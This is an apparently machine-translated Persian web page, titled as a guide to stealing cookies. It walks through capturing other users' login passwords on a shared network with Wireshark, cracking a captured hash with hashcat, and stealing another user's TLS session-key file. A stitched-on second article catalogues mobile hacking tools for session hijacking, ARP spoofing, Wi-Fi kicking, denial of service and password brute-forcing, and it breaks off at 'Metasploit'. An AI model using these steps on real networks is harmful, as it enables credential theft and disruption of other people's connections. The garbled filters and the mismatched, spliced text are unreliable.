خانه - برای مبتدی ها
برنامه هایی برای سرقت کوکی ها توسط IP. راه های سرقت کوکی ها

بسیاری از کاربران متوجه نیستند که با پر کردن یک نام کاربری و رمز عبور هنگام ثبت نام یا مجوز در یک منبع اینترنتی بسته و فشار دادن ENTER، این داده ها به راحتی قابل رهگیری هستند. اغلب آنها از طریق شبکه به شکل ناامن منتقل می شوند. بنابراین، اگر سایتی که قصد ورود به آن را دارید از پروتکل HTTP استفاده می کند، پس گرفتن این ترافیک و تجزیه و تحلیل آن با استفاده از آن بسیار آسان است. با استفاده از Wiresharkو سپس با استفاده از فیلترها و برنامه های خاص رمز عبور را پیدا و رمزگشایی کنید.

بهترین مکان برای رهگیری رمزهای عبور، هسته شبکه است، جایی که ترافیک همه کاربران هنگام ثبت نام در منابع خارجی به منابع بسته (مثلاً پست) یا جلوی روتر برای دسترسی به اینترنت می رود. ما یک آینه راه اندازی کردیم و آماده ایم که احساس کنیم یک هکر هستیم.

مرحله 1. Wireshark را نصب و راه اندازی کنید تا ترافیک را ضبط کنید

گاهی اوقات برای انجام این کار کافی است فقط رابطی را که قصد داریم ترافیک را از طریق آن ضبط کنیم انتخاب کرده و دکمه Start را کلیک کنید. در مورد ما، ما از طریق یک شبکه بی سیم عکس می گیریم.

ضبط ترافیک آغاز شده است.

مرحله 2. فیلتر کردن ترافیک POST ضبط شده

مرورگر را باز می کنیم و سعی می کنیم با استفاده از نام کاربری و رمز عبور وارد برخی منابع شویم. پس از تکمیل فرآیند مجوز و باز شدن سایت، ما گرفتن ترافیک در Wireshark را متوقف می کنیم. سپس، تحلیلگر پروتکل را باز کنید و تعداد زیادی بسته را مشاهده کنید. اینجاست که بیشتر متخصصان فناوری اطلاعات از این کار منصرف می‌شوند زیرا نمی‌دانند در مرحله بعد چه کاری انجام دهند. اما ما می دانیم و علاقه مند به بسته های خاصی هستیم که حاوی داده های POST، که در دستگاه محلی ما هنگام پر کردن یک فرم روی صفحه تولید و ارسال می شوند سرور راه دورهنگامی که روی دکمه "ورود" یا "مجوز" در مرورگر کلیک می کنید.

یک فیلتر ویژه در پنجره وارد می کنیم تا بسته های ضبط شده را نمایش دهد: http.درخواست.روش ==”پست"

و می بینیم که به جای هزاران بسته، فقط یک بسته با داده هایی که به دنبال آن هستیم.

مرحله 3. ورود به سیستم و رمز عبور کاربر را پیدا کنید

به سرعت کلیک راست کرده و مورد را از منو انتخاب کنید TCP Steam را دنبال کنید


پس از این، متنی در پنجره جدیدی ظاهر می شود که محتوای صفحه را به صورت کد بازیابی می کند. بیایید فیلدهای "رمز عبور" و "کاربر" را پیدا کنیم که مربوط به رمز عبور و نام کاربری است. در برخی موارد، هر دو فیلد به راحتی قابل خواندن هستند و حتی رمزگذاری نمی شوند، اما اگر در هنگام دسترسی به منابع بسیار شناخته شده مانند Mail.ru، Facebook، VKontakte و غیره سعی در جذب ترافیک داشته باشیم، رمز عبور رمزگذاری می شود:

HTTP/1.1 302 پیدا شد

سرور: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Set-Cookie: password= ; انقضا=پنجشنبه، 07-نوامبر-2024 23:52:21 GMT; مسیر=/

مکان: loggedin.php

طول محتوا: 0

اتصال: بستن

نوع محتوا: text/html; charset=UTF-8

بنابراین، در مورد ما:

نام کاربری: networkguru

کلمه عبور:

مرحله 4. نوع رمزگذاری را برای رمزگشایی رمز عبور تعیین کنید

برای مثال به وب سایت http://www.onlinehashcrack.com/hash-identification.php#res بروید و رمز عبور خود را در پنجره شناسایی وارد کنید. لیستی از پروتکل های رمزگذاری به ترتیب اولویت به من داده شد:

مرحله 5. رمزگشایی رمز عبور کاربر

بر در این مرحلهما می توانیم از ابزار hashcat استفاده کنیم:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

در خروجی یک رمز عبور رمزگشایی شده دریافت کردیم: simplepassword

بنابراین، با کمک Wireshark، ما نه تنها می‌توانیم مشکلات عملکرد برنامه‌ها و خدمات را حل کنیم، بلکه می‌توانیم خود را به عنوان یک هکر و رهگیری رمزهایی که کاربران در فرم‌های وب وارد می‌کنند، امتحان کنیم. همچنین می‌توانید با استفاده از فیلترهای ساده برای نمایش گذرواژه‌های صندوق پستی کاربران را پیدا کنید:

  • پروتکل و فیلتر POP به این صورت است: pop.request.command == "USER" || pop.request.command == "گذر"
  • پروتکل و فیلتر IMAP به صورت زیر خواهد بود: imap.request حاوی "ورود" است
  • پروتکل SMTP است و باید فیلتر زیر را وارد کنید: smtp.req.command == "AUTH"

و ابزارهای جدی تر برای رمزگشایی پروتکل رمزگذاری.

مرحله 6: اگر ترافیک رمزگذاری شده باشد و از HTTPS استفاده کند چه؟

چندین گزینه برای پاسخ به این سوال وجود دارد.

گزینه 1. هنگامی که اتصال بین کاربر و سرور قطع شد وصل شوید و ترافیک را در لحظه برقراری ارتباط بگیرید (SSL Handshake). هنگامی که یک اتصال برقرار می شود، کلید جلسه می تواند رهگیری شود.

گزینه 2: می‌توانید ترافیک HTTPS را با استفاده از فایل گزارش کلید جلسه ضبط شده توسط فایرفاکس یا کروم رمزگشایی کنید. برای انجام این کار، مرورگر باید طوری پیکربندی شود که این کلیدهای رمزگذاری را در یک فایل لاگ بنویسد (مثال مبتنی بر فایرفاکس) و شما باید آن فایل لاگ را دریافت کنید. در اصل، شما باید فایل کلید جلسه را از آن بدزدید هارد دیسککاربر دیگری (که غیرقانونی است). خوب، سپس ترافیک را ضبط کنید و از کلید حاصل برای رمزگشایی آن استفاده کنید.

شفاف سازی.ما در مورد مرورگر وب شخصی صحبت می کنیم که می خواهند رمز عبور او را بدزدند. اگر منظور ما رمزگشایی ترافیک HTTPS خودمان است و می‌خواهیم تمرین کنیم، این استراتژی جواب می‌دهد. اگر می‌خواهید ترافیک HTTPS سایر کاربران را بدون دسترسی به رایانه‌هایشان رمزگشایی کنید، این کار نمی‌کند - این هم رمزگذاری و هم حریم خصوصی است.

پس از دریافت کلیدها مطابق با گزینه 1 یا 2، باید آنها را در WireShark ثبت کنید:

  1. به منوی Edit - Preferences - Protocols - SSL بروید.
  2. پرچم "مجموعه مجدد رکوردهای SSL که چندین بخش TCP را در بر می گیرند" را تنظیم کنید.
  3. "لیست کلیدهای RSA" و روی ویرایش کلیک کنید.
  4. داده ها را در تمام فیلدها وارد کنید و با کلید مسیر را در فایل بنویسید

«یک گوشی هوشمند با ابزار هک؟ چنین چیزی وجود ندارد،» همین اواخر به شما می گفتیم. راه اندازی برخی از ابزارهای معمول برای اجرای حملات فقط بر روی برخی از Maemo امکان پذیر بود. اکنون بسیاری از ابزارهای آشنا به iOS و اندروید منتقل شده اند و برخی ابزارهای هک نیز به طور ویژه برای محیط موبایل نوشته شده اند. آیا گوشی هوشمند می تواند جایگزین لپ تاپ در تست نفوذ شود؟ تصمیم گرفتیم آن را بررسی کنیم.

اندروید

اندروید نه تنها برای افراد فانی بلکه برای افراد مناسب نیز یک پلتفرم محبوب است. تعداد ][-utilities مفید در اینجا به سادگی خارج از نمودار است. برای این ما می توانیم از ریشه های یونیکس سیستم تشکر کنیم - این کار انتقال بسیاری از ابزارها به اندروید را بسیار ساده کرده است. متأسفانه، گوگل به برخی از آنها اجازه ورود به فروشگاه Play را نمی دهد، بنابراین باید APK مربوطه را به صورت دستی نصب کنید. همچنین، برخی از برنامه های کاربردی نیاز به حداکثر دسترسی به سیستم دارند (به عنوان مثال، فایروال iptables)، بنابراین باید از قبل از دسترسی ریشه مراقبت کنید. هر سازنده در اینجا از فناوری خاص خود استفاده می کند، اما یافتن دستورالعمل های لازم بسیار آسان است. مجموعه خوبی از HOWTO توسط منبع LifeHacker (bit.ly/eWgDlu) گردآوری شده است. با این حال، اگر نتوانستید مدل خاصی را در اینجا پیدا کنید، انجمن XDA-Developers (www.xda-developers.com) همیشه به کمک می آید، جایی که می توانید اطلاعات مختلفی را در مورد هر مدل گوشی اندرویدی بیابید. به هر حال، برخی از ابزارهای شرح داده شده در زیر بدون دسترسی ریشه کار می کنند.

مدیر بسته

BotBrew اجازه دهید بررسی را با یک مدیر بسته غیرمعمول شروع کنیم. توسعه دهندگان آن را «ابزار برای ابرکاربران» می نامند، و این دور از واقعیت نیست. پس از نصب BotBrew، یک مخزن دریافت می کنید که از آنجا می توانید تعداد زیادی ابزار آشنا را که برای اندروید کامپایل شده اند دانلود کنید. از جمله: مفسر Python و Ruby برای اجرای ابزارهای متعددی که در آنها نوشته شده است، یک sniffer tcpdump و یک اسکنر Nmap برای تجزیه و تحلیل شبکه، Git و Subversion برای کار با سیستم های کنترل نسخه و بسیاری موارد دیگر.

اسکنرهای شبکه

PIPS یک گوشی هوشمند نامحسوس که بر خلاف لپ تاپ به راحتی در جیب جا می شود و هرگز مشکوک نمی شود، می تواند برای کاوش شبکه مفید باشد. قبلاً در بالا گفتیم که چگونه می توانید Nmap را نصب کنید، اما گزینه دیگری وجود دارد. PIPS یک پورت از اسکنر Nmap است که به طور خاص برای اندروید اقتباس شده است، البته یک پورت غیر رسمی. این بدان معنی است که می توانید به سرعت دستگاه های فعال را در شبکه پیدا کنید، سیستم عامل آنها را با استفاده از گزینه های اثر انگشت تعیین کنید، اسکن پورت را انجام دهید - به طور خلاصه، هر کاری را که Nmap قادر به انجام آن است انجام دهید. فینگ استفاده از Nmap با وجود تمام قدرتش دو مشکل دارد. در مرحله اول، پارامترهای اسکن از طریق کلیدهای راه اندازی منتقل می شوند، که شما نه تنها باید بدانید، بلکه بتوانید با ناخوشایندی وارد کنید. صفحه کلید موبایل. و ثانیاً نتایج اسکن در خروجی کنسول آنطور که ما می خواهیم واضح نیست. اسکنر Fing این کاستی ها را ندارد؛ خیلی سریع شبکه را اسکن می کند، انگشت نگاری می کند و سپس لیستی از تمام دستگاه های موجود را به صورت واضح نمایش می دهد و آنها را بر اساس نوع (روتر، دسکتاپ، آیفون و غیره) تقسیم می کند. در همان زمان، برای هر میزبان می توانید به سرعت لیستی از پورت های باز را مشاهده کنید. علاوه بر این، از اینجا می توانید با استفاده از مشتری FTP نصب شده در سیستم، مثلاً به FTP متصل شوید - بسیار راحت. NetAudit وقتی نوبت به تجزیه و تحلیل یک میزبان خاص می رسد، ابزار NetAudit می تواند ضروری باشد. بر روی هر دستگاه اندرویدی (حتی غیر روت) کار می کند و به شما امکان می دهد نه تنها به سرعت دستگاه های موجود در شبکه را شناسایی کنید، بلکه آنها را با استفاده از یک پایگاه داده بزرگ اثر انگشت برای شناسایی بررسی کنید. سیستم عاملو همچنین سیستم های CMS مورد استفاده در وب سرور. اکنون بیش از 3000 اثر انگشت دیجیتال در پایگاه داده وجود دارد. ابزارهای شبکه اگر برعکس، باید در سطح پایین تری کار کنید و عملکرد شبکه را به دقت بررسی کنید، بدون Net Tools نمی توانید این کار را انجام دهید. در کار ضروری است مدیر سیستممجموعه ای از ابزارهای کمکی که به شما امکان می دهد عملکرد شبکه ای را که دستگاه به آن متصل است، به طور کامل تشخیص دهید. این بسته شامل بیش از 15 نوع برنامه مختلف مانند ping، traceroute، arp، dns، netstat، route می باشد.

دستکاری ترافیک

کوسه برای ریشه sniffer مبتنی بر tcpdump صادقانه تمام داده ها را در یک فایل pcap ثبت می کند، که سپس می توان با استفاده از ابزارهای آشنا مانند Wireshark یا Network Miner مطالعه کرد. از آنجایی که هیچ قابلیتی برای حملات MITM در آن پیاده سازی نشده است، بیشتر ابزاری برای تجزیه و تحلیل ترافیک شما است. به عنوان مثال، این یک راه عالی برای مطالعه برنامه های نصب شده روی دستگاه شما از مخازن مشکوک است. FaceNiff اگر در مورد برنامه های رزمی برای اندروید صحبت کنیم، یکی از پر سر و صدا ترین ها FaceNiff است که رهگیری و تزریق را در جلسات وب رهگیری شده پیاده سازی می کند. با دانلود بسته APK با این برنامه، می توانید این ابزار هک را تقریباً بر روی هر تلفن هوشمند اندرویدی اجرا کنید و با اتصال به یک شبکه بی سیم، حساب های سرویس های مختلف را رهگیری کنید: فیس بوک، توییتر، VKontakte و غیره - بیش از ده. در مجموع. ربودن Session با استفاده از حمله جعل ARP انجام می شود، اما حمله فقط در اتصالات محافظت نشده امکان پذیر است (FaceNiff نمی تواند در ترافیک SSL قرار گیرد). برای محدود کردن جریان scriptdis، نویسنده حداکثر تعداد جلسات را به سه محدود کرده است - سپس باید با توسعه دهنده تماس بگیرید تا کد فعال سازی خاصی را دریافت کنید. DroidSheep اگر سازنده FaceNiff برای استفاده از آن پول می‌خواهد، DroidSheep یک ابزار کاملاً رایگان با همان عملکرد است. درست است، شما کیت توزیع را در وب سایت رسمی پیدا نخواهید کرد (این به دلیل قوانین سخت آلمان در مورد ابزارهای امنیتی است)، اما می توان آن را بدون هیچ مشکلی در اینترنت پیدا کرد. وظیفه اصلی این ابزار رهگیری جلسات وب کاربران محبوب است شبکه های اجتماعی، با استفاده از همان ARP Spoofing پیاده سازی شده است. اما با اتصالات امنمشکل: مانند FaceNiff، DroidSheep قاطعانه از کار با پروتکل HTTPS خودداری می کند. جعل شبکه این ابزار همچنین ناامنی شبکه های بی سیم باز را نشان می دهد، اما در سطح کمی متفاوت است. جلسات کاربر را رهگیری نمی کند، اما به ترافیک HTTP اجازه می دهد تا با استفاده از یک حمله جعل، دستکاری های مشخصی را با آن انجام دهد. شروع از شوخی های معمولی (تعویض تمام تصاویر در سایت با ترول فیس، ورق زدن همه تصاویر یا مثلاً جایگزینی نتایج گوگل) و پایان دادن به حملات فیشینگ، زمانی که به کاربر صفحات جعلی سرویس های محبوبی مانند facebook.com، linkedin داده می شود. .com، vkontakte.ru و بسیاری دیگر. Anti (Android Network Toolkit توسط zImperium LTD)
اگر بپرسید کدام ابزار هک برای اندروید قدرتمندترین است، احتمالا Anti رقیبی ندارد. این یک ترکیب هکر واقعی است. وظیفه اصلی برنامه اسکن محیط شبکه است. در مرحله بعد، ماژول های مختلفی وارد نبرد می شوند که با کمک آنها یک زرادخانه کامل اجرا می شود: استراق سمع ترافیک، انجام حملات MITM و بهره برداری از آسیب پذیری های یافت شده. درست است، معایبی نیز وجود دارد. اولین چیزی که توجه شما را جلب می کند این است که بهره برداری از آسیب پذیری ها فقط از سرور برنامه مرکزی که در اینترنت قرار دارد انجام می شود و در نتیجه می توان اهدافی را که آدرس IP خارجی ندارند فراموش کرد.

تونل سازی ترافیک

فرمانده کل مشهور - معروف مدیر فایلاکنون در گوشی های هوشمند! همانند نسخه دسکتاپ، سیستمی از پلاگین ها برای اتصال به دایرکتوری های مختلف شبکه و همچنین حالت دو پانل متعارف وجود دارد - مخصوصاً در تبلت ها راحت است. تونل SSH خوب، اما چگونه می توانید از امنیت داده های خود که از طریق یک شبکه بی سیم باز منتقل می شوند اطمینان حاصل کنید؟ علاوه بر VPN که اندروید خارج از جعبه از آن پشتیبانی می کند، می توانید یک تونل SSH ایجاد کنید. برای این منظور، یک ابزار فوق العاده SSH Tunnel وجود دارد که به شما امکان می دهد ترافیک برنامه های انتخاب شده یا کل سیستم را از طریق یک سرور SSH راه دور هدایت کنید. ProxyDroid اغلب لازم است که ترافیک را از طریق یک پروکسی یا SOX ارسال کنید، و در این مورد ProxyDroid کمک خواهد کرد. ساده است: شما انتخاب می کنید که کدام ترافیک برنامه را می خواهید تونل کنید، و یک پروکسی را مشخص می کنید (HTTP/HTTPS/SOCKS4/SOCKS5 پشتیبانی می شوند). اگر مجوز لازم باشد، ProxyDroid نیز از این پشتیبانی می کند. به هر حال، پیکربندی را می توان به یک خاص محدود کرد شبکه بی سیم، انجام داده است تنظیمات مختلفبرای هر یک از آنها

شبکه بی سیم

تحلیلگر Wifi مدیر شبکه بی سیم داخلی خیلی آموزنده نیست. اگر نیاز دارید که به سرعت یک تصویر کامل از نقاط دسترسی نزدیک به دست آورید، ابزار Wifi Analyzer یک انتخاب عالی است. این نه تنها تمام نقاط دسترسی نزدیک را نشان می دهد، بلکه کانالی را که در آن کار می کنند، آدرس MAC آنها و مهمتر از همه، نوع رمزگذاری استفاده شده را نمایش می دهد (با دیدن حروف مورد علاقه "WEP"، می توانیم فرض کنیم که دسترسی به شبکه امن ارائه شده است). علاوه بر این، به لطف نشانگر قدرت سیگنال بصری، اگر نیاز به یافتن نقطه دسترسی مورد نظر از نظر فیزیکی داشته باشید، این ابزار ایده آل است. WiFiKill این ابزار، همانطور که توسعه‌دهنده آن بیان می‌کند، زمانی می‌تواند مفید باشد که شبکه بی‌سیم با مشتریانی که از کل کانال استفاده می‌کنند پر شده باشد، و در این لحظه است که شما به آن نیاز دارید. ارتباط خوبو اتصال پایدار WiFiKill به شما این امکان را می دهد که به طور انتخابی یا بر اساس یک معیار خاص ارتباط کلاینت ها را از اینترنت قطع کنید (مثلاً می توان همه اعضای Yabloko را به تمسخر گرفت). این برنامه به سادگی یک حمله جعل ARP را انجام می دهد و همه مشتریان را به خودشان هدایت می کند. این الگوریتم به طرز احمقانه ای به سادگی بر اساس iptables پیاده سازی شده است. این کنترل پنل شبکه های بی سیم فست فود است :).

ممیزی اپلیکیشن وب

HTTP Query Builder دستکاری درخواست های HTTP از یک کامپیوتر یک تکه کیک است؛ تعداد زیادی برنامه کاربردی و افزونه های مرورگر برای این کار وجود دارد. در مورد گوشی های هوشمند، همه چیز کمی پیچیده تر است. HTTP Query Builder به شما کمک می کند یک درخواست HTTP سفارشی با پارامترهای مورد نیاز خود ارسال کنید، به عنوان مثال، کوکی مورد نظر یا یک User-Agent تغییر یافته. نتیجه درخواست در یک مرورگر استاندارد نمایش داده می شود. روتر Brute Force ADS 2 اگر سایت با استفاده از احراز هویت اولیه دسترسی با رمز محافظت می شود، می توانید قابلیت اطمینان آن را با استفاده از ابزار Router Brute Force ADS 2 بررسی کنید. در ابتدا، این ابزار برای گذرواژه های brute force در پنل مدیریت روتر ایجاد شد، اما واضح است که می تواند باشد. در برابر هر منبع دیگری با حفاظت مشابه استفاده می شود. ابزار کار می کند، اما به وضوح خام است. برای مثال، توسعه‌دهنده نیروی brute force را ارائه نمی‌کند، بلکه فقط با استفاده از یک فرهنگ لغت، نیروی brute force را ارائه می‌کند. AndDOSid مطمئناً شما هم در مورد چنین برنامه پر سر و صدایی برای غیرفعال کردن سرورهای وب مانند Slowloris شنیده اید. اصل عملکرد آن ایجاد و نگه داشتن حداکثر تعداد اتصالات با یک وب سرور راه دور است، بنابراین از اتصال مشتریان جدید به آن جلوگیری می کند. بنابراین، AnDOSid آنالوگ Slowloris درست در دستگاه اندروید شما است! رازی را به شما می گویم، دویست اتصال برای تامین کافی است کار ناپایداراز هر چهار وب سایت یکی از وب سرور آپاچی استفاده می کند. و همه اینها - از تلفن شما!

آب و برق های مختلف

رمزگذاری کنید هنگام کار با بسیاری از برنامه های کاربردی وب و تجزیه و تحلیل منطق آنها، بسیار معمول است که با داده هایی که به صورت کدگذاری شده منتقل می شوند، یعنی Base64 مواجه می شویم. Encode به شما کمک می کند تا این داده ها را رمزگشایی کنید و ببینید دقیقاً چه چیزی در آن ذخیره می شود. شاید با جایگزین کردن نقل قول ها، رمزگذاری مجدد آنها در Base64 و جایگزینی آنها در URL سایتی که در حال تحقیق هستید، خطای درخواستی پایگاه داده را دریافت کنید. HexEditor در صورت نیاز ویرایشگر هگز، سپس برای اندروید نیز موجود است. با HexEditor می‌توانید هر فایلی، از جمله فایل‌های سیستمی را ویرایش کنید، اگر حقوق برنامه را به superuser ارتقا دهید. یک جایگزین عالی برای یک ویرایشگر متن استاندارد، به شما این امکان را می دهد که به راحتی متن مورد نظر را پیدا کرده و آن را تغییر دهید.

دسترسی از راه دور

ConnectBot در حال دسترسی به میزبان راه دور، باید بتوانید از آن استفاده کنید. و برای این ما به مشتریان نیاز داریم. بیایید با SSH شروع کنیم، جایی که ConnectBot در حال حاضر استاندارد واقعی است. بعلاوه رابط کاربر پسند، امکان سازماندهی تونل های امن را از طریق اتصالات SSH فراهم می کند. PocketCloud Remote RDP/VNC یک برنامه مفید که به شما امکان می دهد از طریق سرویس های RDP یا VNC به دسکتاپ راه دور متصل شوید. من بسیار خوشحالم که این دو مشتری در یک هستند؛ نیازی به استفاده از ابزارهای مختلف برای RDP و VNC نیست. مرورگر SNMP MIB مخصوص نوشته شده برای مرورگر اندروید MIB، که با آن می توانید دستگاه های شبکه را توسط آن مدیریت کنید پروتکل SNMP. این می تواند برای توسعه یک بردار حمله در روترهای مختلف مفید باشد، زیرا رشته استاندارد جامعه (به عبارت دیگر، رمز عبور) برای مدیریت از طریق SNMP هنوز لغو نشده است.

iOS

پلتفرم iOS در بین توسعه دهندگان ابزار امنیتی محبوبیت کمتری ندارد. اما اگر در مورد حقوق اندرویددر حالی که روت فقط برای برخی از برنامه ها مورد نیاز بود، جیلبریک تقریبا همیشه در دستگاه های اپل مورد نیاز است. خوشبختانه، حتی برای آخرین سیستم عامل iDevices (5.1.1) در حال حاضر یک ابزار جیلبریک وجود دارد. همراه با دسترسی کامل، یک مدیر برنامه جایگزین به نام Cydia نیز دریافت می کنید که در حال حاضر دارای برنامه های کاربردی بسیاری است.

کار با سیستم

ترمینال موبایل اولین چیزی که می خواهم با آن شروع کنم نصب ترمینال است. به دلایل واضح، در تحویل استاندارد سیستم عامل تلفن همراه گنجانده نشده است، اما برای اجرای برنامه های کاربردی کنسول به آن نیاز داریم که در ادامه به آن خواهیم پرداخت. بهترین پیاده‌سازی شبیه‌ساز ترمینال MobileTerminal است - از چندین ترمینال، حرکات کنترلی (مثلاً برای ارسال Control-C) پشتیبانی می‌کند و به طور کلی از نظر فکری چشمگیر است. iSSH یکی دیگر، بیشتر گزینه دشواربه کنسول دستگاه دسترسی پیدا کنید - OpenSSH را روی آن نصب کنید (این کار از طریق Cydia انجام می شود) و به صورت محلی از طریق یک کلاینت SSH به آن متصل شوید. اگر از کلاینت مناسبی مانند iSSH استفاده می کنید که دارای کنترل شگفت انگیز صفحه لمسی است، این روش حتی راحت تر از استفاده از MobileTerminal است.

شنود داده ها

پیرنی و پیرنی پرو اکنون که به کنسول دسترسی دارید، می توانید برنامه های کاربردی را امتحان کنید. بیایید با Pirni شروع کنیم، که به عنوان یک اسنیفور تمام عیار برای iOS در تاریخ ثبت شد. متأسفانه، ماژول Wi-Fi محدود ساختاری که در دستگاه تعبیه شده است را نمی توان به حالت غیرقانونی لازم برای رهگیری عادی داده تغییر داد. بنابراین برای رهگیری داده ها از جعل ARP کلاسیک استفاده می شود که با کمک آن تمام ترافیک از طریق خود دستگاه منتقل می شود. نسخه استاندارد ابزار از کنسول راه اندازی می شود، جایی که علاوه بر پارامترهای حمله MITM، نام فایل PCAP نیز مشخص شده است که تمام ترافیک در آن ثبت شده است. این ابزار دارای یک نسخه پیشرفته تر است - Pirni Pro، که دارای یک رابط گرافیکی است. علاوه بر این، می تواند ترافیک HTTP را در لحظه تجزیه و تحلیل کند و حتی به طور خودکار داده های جالب را از آنجا بیرون بکشد (به عنوان مثال، لاگین و رمز عبور)، با استفاده از عبارات با قاعده، که در تنظیمات تنظیم شده اند. Intercepter-NG (نسخه کنسول) اسنیفر معروف Intercepter-NG که چندین بار در مورد آن نوشته ایم، اخیرا نسخه کنسولی داشته است. همانطور که نویسنده می‌گوید، اکثر کدها با ANSI C خالص نوشته شده‌اند که تقریباً در هر محیطی یکسان رفتار می‌کند، بنابراین نسخه کنسول از همان ابتدا هم روی ویندوز دسکتاپ، لینوکس و BSD و هم روی پلتفرم‌های موبایل از جمله iOS کار می‌کرد. و اندروید. نسخه کنسول در حال حاضر گرفتن رمزهای عبور ارسال شده از طریق پروتکل های مختلف، رهگیری پیام های پیام رسان فوری (ICQ/Jabber و بسیاری دیگر)، و همچنین بازیابی فایل ها از ترافیک (HTTP/FTP/IMAP/POP3/SMTP/SMB) را اجرا می کند. در عین حال، عملکردهای اسکن شبکه و ARP Poison با کیفیت بالا در دسترس هستند. برای عملکرد صحیح، ابتدا باید بسته libpcap را از طریق Cydia نصب کنید (فراموش نکنید بسته های توسعه را در تنظیمات فعال کنید). همه دستورالعمل‌های راه‌اندازی به تنظیم حقوق صحیح خلاصه می‌شوند: chmod +x intercepter_ios. در مرحله بعد، اگر sniffer را بدون پارامتر اجرا کنید، یک رابط تعاملی شفاف Itercepter ظاهر می شود که به شما امکان می دهد هر گونه حمله ای را انجام دهید. Ettercap-NG باورش سخت است، اما این ابزار پیچیده برای اجرای حملات MITM در نهایت به iOS منتقل شد. پس از کار بسیار زیاد، موفق شدیم یک پورت موبایل کامل بسازیم. برای اینکه خود را از رقصیدن با تنبور حول وابستگی ها در حین خود کامپایل نجات دهید، بهتر است پس از افزودن theworm.altervista.org/cydia (مخزن TWRepo) به عنوان منبع داده، یک بسته از قبل ساخته شده با استفاده از Cydia نصب کنید. که در مشمولو ابزار etterlog، که به استخراج انواع مختلف اطلاعات مفید از زباله جمع‌آوری‌شده (به عنوان مثال، حساب‌های دسترسی FTP) کمک می‌کند.

تجزیه و تحلیل شبکه های بی سیم

آنالایزر وای فای در قدیم نسخه های iOSصنعتگران از aircrack استفاده کردند و توانستند کلید WEP را بشکنند، اما ما بررسی کردیم: این برنامه در دستگاه های جدید کار نمی کند. بنابراین برای مطالعه وای فای باید فقط به اسکنرهای وای فای بسنده کنیم. آنالایزر وای فایتجزیه و تحلیل و نمایش اطلاعات در مورد تمام شبکه های 802.11 موجود در اطراف، از جمله اطلاعات در مورد SSID، کانال ها، فروشندگان، آدرس های MAC و انواع رمزگذاری. این ابزار نمودارهای بصری را در زمان واقعی بر اساس داده های موجود در هوا ایجاد می کند. با چنین برنامه ای به راحتی می توانید مکان فیزیکی نقطه را پیدا کنید، اگر ناگهان آن را فراموش کنید، و به عنوان مثال، به پین ​​WPS نگاه کنید، که می تواند برای اتصال مفید باشد.

اسکنرهای شبکه

Scany هر pentester در هر جای دنیا بدون توجه به اهداف و اهداف از چه برنامه ای استفاده می کند؟ اسکنر شبکه. و در مورد iOS، این به احتمال زیاد قدرتمندترین ابزار Scany خواهد بود. به لطف مجموعه ای از ابزارهای داخلی، می توانید به سرعت تصویر دقیقی از آن دریافت کنید دستگاه های شبکهاوه و مثلا پورت ها را باز کنید. علاوه بر این، این بسته شامل ابزارهای تست شبکه مانند ping، traceroute، nslookup است. Fing با این حال، بسیاری از مردم Fing را ترجیح می دهند. این اسکنر عملکرد بسیار ساده و محدودی دارد، اما برای اولین آشنایی با شبکه، مثلاً یک کافه تریا، کاملاً کافی است :). نتایج اطلاعاتی را در مورد خدمات موجود در ماشین های راه دور، آدرس های MAC و نام میزبان متصل به شبکه اسکن شده نمایش می دهد. نیکتو به نظر می رسد که همه نیکتو را فراموش کرده اند، اما چرا؟ پس از همه، شما به راحتی می توانید این اسکنر آسیب پذیری وب را که به زبان اسکریپت (یعنی Perl) نوشته شده است، از طریق Cydia نصب کنید. این بدان معناست که می توانید به راحتی آن را از ترمینال بر روی دستگاه جیلبریک خود راه اندازی کنید. نیکتو خوشحال می شود که در اختیار شما قرار دهد اطلاعات تکمیلیدر منبع وب آزمایش شده علاوه بر این، می توانید امضاهای جستجوی خود را با دستان خود به پایگاه داده دانش آن اضافه کنید. sqlmap این ابزار قدرتمندبرای بهره برداری خودکار از آسیب پذیری های SQL، در پایتون نوشته شده است، به این معنی که وقتی مفسر را نصب کردید، می توانید به راحتی مستقیماً از دستگاه تلفن همراه خود از آن استفاده کنید.

کنترل از راه دور

اسکن SNMP بسیاری از دستگاه های شبکه (از جمله روترهای گران قیمت) با استفاده از پروتکل SNMP مدیریت می شوند. این ابزار به شما امکان می دهد تا زیرشبکه ها را برای سرویس های SNMP موجود با مقادیر رشته های جامعه از قبل شناخته شده (به عبارت دیگر، رمزهای عبور استاندارد) اسکن کنید. توجه داشته باشید که جستجوی سرویس‌های SNMP با رشته‌های استاندارد جامعه (عمومی/خصوصی) در تلاش برای دسترسی به مدیریت دستگاه، بخشی جدایی‌ناپذیر از هر آزمایش نفوذ است، همراه با شناسایی خود محیط و شناسایی خدمات. iTap Mobile RDP / iTap Mobile VNC دو ابزار از یک سازنده برای اتصال به دسکتاپ راه دور با استفاده از پروتکل‌های RDP و VNC طراحی شده‌اند. ابزارهای مشابه در اپ استورتعداد زیادی وجود دارد، اما اینها مواردی هستند که استفاده از آنها به خصوص راحت است.

بازیابی رمز عبور

هیدرا برنامه افسانه ای که به میلیون ها هکر در سراسر جهان کمک می کند رمز عبور خود را "به خاطر بسپارند" به iOS منتقل شده است. اکنون می توانید رمزهای عبور سرویس هایی مانند HTTP، FTP، TELNET، SSH، SMB، VNC، SMTP، POP3 و بسیاری دیگر را مستقیماً از آیفون خود جستجو کنید. درست است، برای حمله مؤثرتر، بهتر است از فرهنگ لغت‌های brute force خوب تهیه کنید. پاس قاطر همه به طور مستقیم از آسیب پذیری استفاده می دانند رمزهای عبور استاندارد. Pass Mule نوعی دایرکتوری است که شامل انواع لاگین ها و رمزهای عبور استاندارد برای دستگاه های شبکه است. آنها به راحتی بر اساس نام فروشنده، محصول و مدل سازماندهی می شوند، بنابراین یافتن مورد نیاز شما دشوار نخواهد بود. این برنامه برای صرفه جویی در زمان در جستجوی کتابچه راهنمای روتر، ورود به سیستم و رمز عبور استاندارد طراحی شده است که باید آن را پیدا کنید.

بهره برداری از آسیب پذیری ها

متاسپلویت
